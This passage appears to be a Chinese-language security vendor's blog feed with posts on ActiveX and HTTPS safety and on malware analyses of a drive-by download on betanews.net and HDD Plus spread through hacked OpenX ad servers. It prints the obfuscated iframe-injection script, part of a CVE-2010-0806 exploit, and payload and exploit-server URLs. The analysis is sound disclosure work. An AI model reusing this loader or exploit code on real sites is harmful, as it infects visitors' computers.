假設,你目前正在瀏覽網路銀行或 WebATM 網頁,這些網站的運作也都會使用到 Active X 元件,在確認你瀏覽的網站確實是銀行的網址,並非釣魚網頁後,也都安裝Active X 元件才能正常使用網路銀行或 WebATM 功能。<br />
<br />
假設,你正在瀏覽賭博或色情網站,網頁出現需要安裝 Active X 元件,這時,你還進行安裝動作,這時,你的風險相對增加很多,很可能就安裝了惡意的元件,導致瀏覽器的異常發生。<br />
<br />
對於各瀏覽器的「附加元件」,網友都要小心安裝使用,這就跟目前很流行的 APP 概念(iPhone的APP、Fackbook 的APP)類似,要是不小心使用遭惡意利用的 APP 哪就麻煩了。<br />
<br />
完整文章亦投稿於「<a href="http://www.isecutech.com.tw/">資安人雜誌</a>,2010. Jan/Feb. No.73,你的上網行為安全嗎?」。<br />
本文也張貼於「<a href="http://mysecure.blogspot.com/2011/03/surfing-secure-for-active-x.html">資安之我見</a>」。<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-153920343215867348?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=BfoDecySAdA:4NJG48GJfAE:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=BfoDecySAdA:4NJG48GJfAE:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=BfoDecySAdA:4NJG48GJfAE:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=BfoDecySAdA:4NJG48GJfAE:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/BfoDecySAdA" height="1" width="1"/>Crane_Kuhttp://www.blogger.com/profile/00147754162769411489crane_ku@hotmail.com0http://armorize-cht.blogspot.com/2011/03/surfing-secure-for-active-x.htmltag:blogger.com,1999:blog-1441759431140700676.post-38324710767037303532011-02-27T13:09:00.001+08:002011-02-27T13:09:56.585+08:002011-02-27T13:09:56.585+08:00上網安全之HTTPS/SSL (Surfing Secure for HTTPS/SSL)上網安全這是個很大的議題,尤其在電子郵件的用戶端程式 Web 化後,網友只要以瀏覽器就能完成所有事情,不過還是有部分網友習慣使用特定的收信軟體,如Outlook…等,主要原因還是用於同步周邊裝置,如早期的 PDA、智慧型手機…等。但,大部分的網友,多半只要有瀏覽器就可以完成上網作業以及所需工作。<br />
當使用者對瀏覽器的依賴持續加深,成為不可或缺的工具,相對的,對瀏覽器的操作使用就必須更加深入了解才行,善用工具、正確使用、建立防護觀念,將會是網友持續努力的一個課題。<br />
<br />
這邊將針對 SSL (Secure Sockets Layer) 、 Active X、Cookie/Session 身份管控、短網址...等各部分來說明,為了<strike>灌水</strike>使網友充分了解,這裡將分文說明:<br />
<br />
首先是 SSL,它並不代表這個網站是很安全、不會被入侵的。<br />
<br />
<a href="http://zh.wikipedia.org/zh-tw/%E5%82%B3%E8%BC%B8%E5%B1%A4%E5%AE%89%E5%85%A8">SSL</a> 是一種加密技術,主要用於網際網路的傳輸加密,指的是「瀏覽器」與「網站」之間,透過網際網路時,會使用加密技術傳遞資料,<b>避免他人在中間竊取網路封包,窺探網友的瀏覽網頁內容資訊</b>;一般大多實作為 <a href="http://zh.wikipedia.org/zh-tw/HTTPS">HTTPS</a> 方式,也就是說瀏覽網站的網址開頭會是「https://xxx.xxx/」,但要注意的是並非「https」開頭,就表示有加密,必須要多識別一個圖示:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-mIk_1rWFs94/TV4U4PZFyMI/AAAAAAAAAiA/wc36MMnKwxM/s1600/74349_https_F.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://2.bp.blogspot.com/-mIk_1rWFs94/TV4U4PZFyMI/AAAAAAAAAiA/wc36MMnKwxM/s400/74349_https_F.jpg" width="350" /> </a></div><div style="text-align: center;">(圖片來源:http://www.microsoft.com/hk/athome/chinese/security/images/online/74349_https_F.jpg)</div><span class="fullpost"><br />
對,就是一個「安全鎖」的圖案,這個圖案在各瀏覽器呈現的位置會不太一樣,且一定要出現在該出現的位置才正確。沒錯!!問題又來了。誰知道該出現在哪裡呀?很抱歉這是網路生存的基本技巧,只要網路使用者,你就必須了解,就跟<strike>吃飯</strike>呼吸一樣。<br />
<br />
很多網站會把「HTTPS」與「網站安全」劃上等號,這是網路誤解。這不能怪網友,很多網站是刻意把這等號劃上的,詳細原因這就不多說了。網友一定要知道,<b>「HTTPS」只保障「瀏覽器」與「網站」之間的網路傳輸安全</b>;另外還有端點的問題,也就是說,網站主機或瀏覽器主機還是可能遭植入惡意程式,而遭受攻擊。<br />
<br />
回到先前話題,如何知道「HTTPS」的加密功能正在運作呢?不同瀏覽器「安全鎖」的圖案該出現在哪裡呢?你可以試著以瀏覽器連結下列網址:「<a href="https://encrypted.google.com/">https://encrypted.google.com/</a>」,找到「安全鎖」的圖案,如下圖:<br />
<br />
<a href="http://4.bp.blogspot.com/-DhUDKjwiO0A/TV3lapR2D1I/AAAAAAAAAg4/heZgM2tkKvM/s1600/P-1.png"><img border="0" height="164" src="http://4.bp.blogspot.com/-DhUDKjwiO0A/TV3lapR2D1I/AAAAAAAAAg4/heZgM2tkKvM/s200/P-1.png" width="195" /></a><a href="http://3.bp.blogspot.com/-11sxYANHWDU/TV3lazfQOPI/AAAAAAAAAhA/3sMJdDBx5e0/s1600/P-2.png"><img border="0" height="164" src="http://3.bp.blogspot.com/-11sxYANHWDU/TV3lazfQOPI/AAAAAAAAAhA/3sMJdDBx5e0/s200/P-2.png" width="195" /></a><a href="http://4.bp.blogspot.com/-C7sNwYsfoZw/TV3lbHYsEXI/AAAAAAAAAhI/d1vyeYRKRl8/s1600/P-3.png"><img border="0" height="164" src="http://4.bp.blogspot.com/-C7sNwYsfoZw/TV3lbHYsEXI/AAAAAAAAAhI/d1vyeYRKRl8/s200/P-3.png" width="195" /></a><br />
<br />
在了解「安全鎖」的圖案的位置之後,接下來就是要確定這些「安全鎖」必須經得起考驗了,這也是瀏覽者可以驗證圖示的正確性。可以<b>點擊</b>這些「安全鎖」圖案,去查詢所謂「憑證」的內容,如下圖:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-my7yfMGIeeQ/TV3nf9nL3aI/AAAAAAAAAhQ/kcJVP-eLqjo/s1600/P-4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="370" src="http://2.bp.blogspot.com/-my7yfMGIeeQ/TV3nf9nL3aI/AAAAAAAAAhQ/kcJVP-eLqjo/s400/P-4.png" width="400" /></a></div><br />
「憑證」的內容中包含許多資訊,其中詳細資訊包含的加密使用的相關技術,關係著這是否有機會破密的可能性,對瀏覽使用者來說只能被動性的接受;但,瀏覽使用者必須了解一點,上圖中<b>「發給」(有的瀏覽器會用「網站」)的網域,必須與瀏覽器「瀏覽的網域(或稱網址名稱)」要契合</b>,且這個網站的網址是沒有問題(確實是你要瀏覽的網站)的。在瀏覽的過程中,看到「安全鎖」圖案正常的運作,就表示網路通訊是有在加密保護下的。<br />
<br />
這是識別釣魚網站的技巧之一,其他識別釣魚網站方式可以本部落格,例如「<a href="http://armorize-cht.blogspot.com/2010/09/challenge-to-phishing-ii.html">模擬實戰釣魚網站(Challenge to Phishing-II) Part-II</a>」。了解以上幾個動作之後,接下來就是了解其應用了,<b>你必須了解何謂「全程加密」與「登入加密」</b>,簡單的說,「全程加密」是自帳號登入開始,到帳號登出的過程都是在加密的狀態;而「登入加密」只有在帳號登入的動作進行加密。所以「登入加密」只保護了使用者帳號密碼,「全程加密」保護了更多資料內容。若您使用網路銀行時,應該是「全程加密」還是「登入加密」呢?<br />
<br />
另外,您使用網頁存取電子郵件時,是「全程加密」還是「登入加密」呢?Gmail已經在2010年初就使用「全程加密」了,Hotmail於2010年11月出也推出「全程加密」功能,不過,還需要使用者手動開啟「全程加密」的功能;Yahoo信箱目前還只有「登入加密」的功能。對於瀏覽者經常使用的電子郵件信箱,提供哪些保護,也是網友應該去加以了解的。<br />
<br />
Facebook也開始提供「全程加密」功能了,就在2011年一月底,可以參考<a href="http://gordon168.tw/?p=441">這裡</a>。它也是需要手動開啟的喔!!<br />
<br />
另外,「全程加密」也會有假貨...lol。<br />
<br />
來看這張圖顯示的訊息:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-BEXDicdwc6k/TV4e0_WjmhI/AAAAAAAAAiI/hPxht1a3tGI/s1600/HTTPS-IE-XD.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://3.bp.blogspot.com/-BEXDicdwc6k/TV4e0_WjmhI/AAAAAAAAAiI/hPxht1a3tGI/s400/HTTPS-IE-XD.PNG" width="400" /></a></div><br />
這是 IE 8 才有的特別功能,預設狀況下是會跳出此視窗的。來看看微軟的說法:「<a href="http://support.microsoft.com/kb/971691/zh-tw">為何當使用 IE 8 瀏覽網站時,總會跳出安全性警告視窗?</a>」中「問題的來龍去脈」。這是在說啥呢?即便是「全程加密」,<b>但過程中仍有部分網頁內容是沒有經過加密的。</b>哪些網頁內容有加密哪些沒加密呢?這也不是使用者能選擇的,也許重要的網頁內容資訊是沒有加密的哩。目前國內還有許多證券網站、網路銀行還是會跳出這訊息視窗的,網友可得多加注意呀!!<br />
<br />
講白一點好了。<b>出現上面的警告視窗,即便有 HTTPS 但可能一點用也沒有,純唬你的... ...哀哉。</b>啊... ...沒看到這警告視窗,借問可是用 IE 8。<br />
<br />
~~問世間資安為何物,直叫鄉民出生入死~~<br />
<br />
完整文章投稿於「<a href="http://www.isecutech.com.tw/">資安人雜誌</a>,2011 Jan/Feb. No.73,你的上網行為安全嗎?」。<br />
本文也張貼於「<a href="http://mysecure.blogspot.com/2011/02/surfing-secure-for-httpsssl.html">資安之我見</a>」。<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-3832471076703730353?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=dT_V0_MA4VU:bxpKluZzOAA:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=dT_V0_MA4VU:bxpKluZzOAA:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=dT_V0_MA4VU:bxpKluZzOAA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=dT_V0_MA4VU:bxpKluZzOAA:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/dT_V0_MA4VU" height="1" width="1"/>Crane_Kuhttp://www.blogger.com/profile/00147754162769411489crane_ku@hotmail.com1http://armorize-cht.blogspot.com/2011/02/surfing-secure-for-httpsssl.htmltag:blogger.com,1999:blog-1441759431140700676.post-12427007059203894652011-01-31T16:56:00.004+08:002011-01-31T18:12:08.606+08:002011-01-31T18:12:08.606+08:00是惡意廣告(Malvertising)? 還是偷渡式下載(Drive-by download)?最近,我們正在思考有關如何來產生一些惡意廣告的統計數據。<br />
<br />
不過有時候它是很狡詐的,因為現在愈來愈多的偷渡式下載(drive-by downloads)會偽裝自已是來自廣告伺服器,試圖地隱藏它自已。<br />
<br />
這邊有一個例子。最近我的掃瞄器偵測到一個在韓國排名第671的betanews.net的新聞網站,會進行偷渡式下載(drive-by downloads)。<a href="http://3.bp.blogspot.com/_hELDi5B8zOI/TT28uEerpBI/AAAAAAAACLE/v2QHCfSYpKI/s1600/2011-01-25_015347.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5565812214162236434" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TT28uEerpBI/AAAAAAAACLE/v2QHCfSYpKI/s1600/2011-01-25_015347.png" style="display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
當我們在寫這篇blog時,它的確還活躍著。 <br />
<span class="fullpost"><br />
在它的首頁http://www.betanews.net/ 包含下面一段javascript,會來顯示廣告:<br />
<pre class="brush: html;"><script type="text/javascript" src="/js/banner.js"></script>
</pre><br />
而這/js/banner.js就是被感染的檔案,在檔案的尾部被插入了以下一段混碼過的惡意程式碼:<br />
<pre class="brush: js;">if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}
</pre><br />
在經過解碼後,我們可以得到:<br />
<pre class="brush: html;"><iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe>
</pre><br />
這個 "ilikec<b>1</b>ick.com" 網域,顯然的是要試圖偽裝成"ilikeclick.com",<a href="http://home.ilikeclick.com/hope/company/introduce.html">這是一個韓國網路廣告商</a>:<br />
<a href="http://2.bp.blogspot.com/_hELDi5B8zOI/TT3CZrnoRZI/AAAAAAAACLM/4PGPyKkBka0/s1600/ilikeclick.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5565818460961260946" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TT3CZrnoRZI/AAAAAAAACLM/4PGPyKkBka0/s1600/ilikeclick.jpg" style="display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
http://ad.ilikec<b>1</b>ick.com/ad.asp 包含javascript的exploit:<br />
<pre class="brush: js;"><script>
document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>");
var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var
(omitted)
</pre><br />
這是 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">iepeers (CVE-2010-0806)</a> 的exploit,在成功打入這個漏洞後,瀏覽器會下載http://weniz.co .kr/mall/updir/cs/pds.exe並執行它。<br />
<br />
這個ad.asp exploit<a href="http://www.virustotal.com/file-scan/report.html?id=b1c91eb80ab45dc1414874875420455444dbbe1d71710a85f2970e2297230b77-1295893679">在VirusTotal的偵測率為7/42</a> ,而這個惡意程式pds.exe的偵測率則為<a href="https://www.virustotal.com/file-scan/report.html?id=0004083a90da5500c4f5283562a5dc3d6d54b47a82771d556cb7c44a85f7821a-1295877989">27/42</a>。<br />
<br />
好,就以這個案例來看,那它算是drive-by download攻擊呢? 還是惡意廣告攻擊呢?<br />
這非常類似<a href="http://blog.armorize.com/2010/12/hdd-plus-malware-spread-through.html">上一次的 "adshufffle.com"惡意廣告事件</a>,這個事件也包含了一個惡意網域"ilikec<b>1</b>ick.com"企圖偽裝成"ilikeclick.com"。<br />
<br />
所以這該歸類為惡意廣告嗎?並不是,攻擊者並非註冊 ilikec1ick.com 網域後,去汙染廣告本身。這情況看來,是攻擊者入侵某廣告平台後,<strike>修改</strike>竄改正常 js 文件達到散播惡意程式。不過為了延長註冊的惡意網域存活時間,所以註冊了與真正域名很相似的網域,希望減少被注意的機會。<br />
<br />
在惡意廣告統計分類上,目前面臨一個嚴峻的挑戰。以往常見的網頁掛馬攻擊手法如汙染惡意廣告、大量SQL漏洞掛馬、大量代管主機掛馬、大量討論版漏洞掛馬...等。這個攻擊手法應該被歸納為"point of entry",然而這需要相當長時間的人工攻擊過程。<br />
<br />
可參考:<a href="http://blog.armorize.com/2011/01/malvertising-or-drive-by-web-malware.html">Malvertising or Drive-by web malware attack?</a><br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-1242700705920389465?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=6JV01ZCiCP0:g-OsBoveePU:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=6JV01ZCiCP0:g-OsBoveePU:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=6JV01ZCiCP0:g-OsBoveePU:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=6JV01ZCiCP0:g-OsBoveePU:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/6JV01ZCiCP0" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com0http://armorize-cht.blogspot.com/2011/01/malvertising-or-drive-by-web-malware.htmltag:blogger.com,1999:blog-1441759431140700676.post-2184838212656798982010-12-20T11:16:00.019+08:002010-12-22T12:27:02.155+08:002010-12-22T12:27:02.155+08:00關於HDD Plus同時也透過OpenX弱點進行散播及背後的藏鏡人(Credits: Chris Hsiao, Wayne Huang, NightCola Lin, Fyodor Yarochkin)<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TQwF1kAlypI/AAAAAAAACJg/6My1Sky6OUw/s1600/HDD_Tools_OpenX_Hack.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 748px;" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TQwF1kAlypI/AAAAAAAACJg/6My1Sky6OUw/s1600/HDD_Tools_OpenX_Hack.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5551818858398337682" /></a><br />在我們<a href="http://armorize-cht.blogspot.com/2010/12/google%E5%8F%8Amicrosoft%E7%9A%84%E5%85%A9%E5%A4%A7%E5%BB%A3%E5%91%8A%E5%B9%B3%E5%8F%B0%E9%81%AD%E6%8E%9B%E9%A6%AC%E5%88%A9%E7%94%A8%E6%95%A3%E6%92%AD%E6%83%A1%E6%84%8F%E8%BB%9F%E4%BB%B6.html">上一篇</a>, 我們有提到HDD Plus這個惡程式透過DoubleClick及MSN網路來散播。而再來寫這個後續報導主要有兩個原因:<br /><br />A. 這整個事件背後的藏鏡人到底是誰? 很多人感到相當好奇。<br />B. 它仍然透過OpenX的弱點以相當快的速度正在散播。<br /><br />在我們進入細節之前,這邊有幾個重點摘要:<br />1. HDD Plus (或 HDD Tools) 透過被入侵的OpenX網路廣告交換平台進行散播。<br />2. 使用了BleedingLife v2的exploit pack,而防毒軟體對於之中的exploit的偵測率很低(2/42)。這個Exploit Pack支援以下所列的Exploits: <a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=218483821265679898" org="" bin="" name="CVE-2010-2884">CVE-2010-2884</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297">CVE-2010-1297</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188">CVE-2010-0188</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842">CVE-2010-0842</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3552">CVE-2010-3552</a> 及 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992">CVE-2008-2992</a>.<br />3. 而對於這個HDD Plus惡意程式本身,防毒軟體的偵測率約為50%。<br />4. 這個Exploit Pack打到使用者的成功率約在28%,也就是100個人瀏覽此網頁的話,就有28人會被打中,算是相當高的一個比例。<br />5. 我們相信在莫斯科的Slevin先生也參與了這個HDD Plus的散播行動,並且積極透過更新穎的手法來進行散播。<br /><br /><b>[透過OpenX的弱點來進行散播]</b><br />OpenX有許多已知的弱點,在7月底我們開始看到駭客入侵OpenX的事件以及 <a href="http://creators.ning.com/forum/topics/help-google-is-saying-that-my?commentId=4244211:Comment:246598">插入惡意的iframes</a> 指到drive-by downloads。 我們都記得<a href="http://www.thinq.co.uk/2010/9/13/pirate-bay-cracked-spread-malware/">The Pirate Bay-OpenX事件</a>,再把時間回朔到九月份(我們可以看到<a href="http://www.h-online.com/open/news/item/Web-sites-distribute-malware-via-hacked-OpenX-servers-1079099.html">這邊</a>)。<br /><br />很快的在此事件發生後,OpenX在九月14日<a href="http://blog.openx.org/09/security-update/">發佈了一個修補程式</a>,確認了2.8.7之前的版本確實是有弱點的。而我們的掃瞄器是在8月初,開始發現OpenX被插入惡意的iframe。<br /><br />在我們的<a href="http://armorize-cht.blogspot.com/2010/12/google%E5%8F%8Amicrosoft%E7%9A%84%E5%85%A9%E5%A4%A7%E5%BB%A3%E5%91%8A%E5%B9%B3%E5%8F%B0%E9%81%AD%E6%8E%9B%E9%A6%AC%E5%88%A9%E7%94%A8%E6%95%A3%E6%92%AD%E6%83%A1%E6%84%8F%E8%BB%9F%E4%BB%B6.html">上一篇報導</a>,提到"HDD Plus"的散播方式其實跟這次是差不多的,只不過這次它的名字改成了 "HDD Tools"。當受害者瀏覽受到入侵的OpenX時,這個受到感染的廣告頁面 /www/delivery/ajs.php 會跑起一段javascript來產生一個iframe然後重導到惡意的網站,然後進行drive-by download的程序,一旦成功這個HDD Tools將會悄悄的被安裝到受害者的電腦中,然後顯示一堆假的警告訊息,直到受害付費來購買這套軟體,大約80美元。<br /><br />讓我們用 http://www.takeatime.com/ 這個網站來當例子。 在我們寫這篇報導時,這個網站正安裝了含有漏洞的OpenX,且已被入侵並開始供給惡意程式。 下面是我們拍的一段影片用來圖解說明整個流程,其中包含一開始使用者的瀏覽,到最後的惡意程式感染及執行的過程:<div><br /><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/WY6KfJHaYb4?fs=1&hl=zh_TW"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/WY6KfJHaYb4?fs=1&hl=zh_TW" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><br /><br />註:在這個案例中所使用的exploit pack為BleedingLife v2,而你可以透過以下來連結實地存取到這台exploit server(假設它還存活著的話)<a href="http://expa42.co.cc/bl3/statistics/login.php">http://expa42.co.cc/bl3/statistics/login.php</a>。</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TQwNh_7YE6I/AAAAAAAACJw/igqmEnCmANA/s1600/BleedingLife_Login.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 748px;" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TQwNh_7YE6I/AAAAAAAACJw/igqmEnCmANA/s1600/BleedingLife_Login.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5551827318388298658" /></a><br />沒有密碼? 沒關係,我們可以透過以下連結來看到目前的狀態(假設它還存活著的話):<a href="http://expa42.co.cc/bl3/statistics/update.php">http://expa42.co.cc/bl3/statistics/update.php</a><br /><br />為了知道它實際的感染情況,我們重新去設定了它的狀態,而在8個小時之後,我們得到了以下的結果:<br /><br />document.getElementById("visitors").innerHTML = 5635;<br />document.getElementById("exploited").innerHTML = 1583;<br />document.getElementById("percentage").innerHTML = 28.09;<br /><br />這表示expa42.co.cc(這只是眾多惡意網域中的其中之一)每小時約有700參訪者,而其中的200人就會被成功感染安裝此惡意程式,也就是將近有28%的入侵成功率,這是相當高的一個比例。<br /><br />以下列出這個Bleeding Life v2 exploit pack所支援的Exploits:<br /><br />1. Adobe Flash Player 10.x on Windows, Mac OS X, Linux, and Solaris, Android authplay.dll (<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=218483821265679898" org="" bin="" name="CVE-2010-2884">CVE-2010-2884</a>)<br />2. Adobe Flash Player before 8.x 9.x 10.x on Windows and Mac OS X crafted SWF content (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297">CVE-2010-1297</a>)<br />3. Adobe Reader and Acrobat 8.x 9.x arbitrary code execution (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188">CVE-2010-0188</a>)<br />4. Oracle Java SE and Java for Business sound component (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842">CVE-2010-0842</a>)<br />5. Oracle Java SE and Java for Business (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3552">CVE-2010-3552</a>)<br />6. Adobe Acrobat and Reader util.printf (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992">CVE-2008-2992</a>)<br />(註:這個pack中,沒包含Microsoft的exploit)<br /><br />下列是整個侵入過程,我們使用takeatime.com來當例子。<br /><br />當受害者瀏覽takeatime.com網站時,會看到一個OpenX的廣告標籤如下:<br /><pre class="brush: html;"><div class="banner"><br /><!--/* OpenX Javascript Tag v2.8.1 */--><br /><script type='text/javascript'><!--//<![CDATA[<br />var m3_u = (location.protocol=='https:'?'https://openx.takeatime.com/www/delivery/ajs.php':'http://openx.takeatime.com/www/delivery/ajs.php');<br />var m3_r = Math.floor(Math.random()*99999999999);<br />if (!document.MAX_used) document.MAX_used = ',';<br />document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);<br />document.write ("?zoneid=1");<br />document.write ('&cb=' + m3_r);<br />if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);<br />document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));<br />document.write ("&loc=" + escape(window.location));<br />if (document.referrer) document.write ("&referer=" + escape(document.referrer));<br />if (document.context) document.write ("&context=" + escape(document.context));<br />if (document.mmm_fo) document.write ("&mmm_fo=1");<br />document.write ("'><\/scr"+"ipt>");<br />//]]>--></script><noscript><a href='http://openx.takeatime.com/www/delivery/ck.php?n=a06928b3&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.takeatime.com/www/delivery/avw.php?zoneid=1&cb=INSERT_RANDOM_NUMBER_HERE&n=a06928b3' border='0' alt='' /></a></noscript><br /></div><br /></pre><div><br /></div>這是因為takeatime.com是使用OpenX,而這個標籤會在頁面上顯示一個OpenX的廣告,因此瀏覽器會載入/www/delivery/ajs.php。對一個含有弱點的OpenX來說,這個ajs.php就是一個最常見的感染途徑。在這個takeatime.com網站中的ajs.php內容如下:<br /><pre class="brush: html;"><br />if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFObjectUtil=="undefined"){org.openx.SWFObjectUtil=new Object();}org.openx.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=org.openx.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new org.openx.PlayerVersion(_5.toString().split(".")));}this.installedVer=org.openx.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){org.openx.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};org.openx.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return 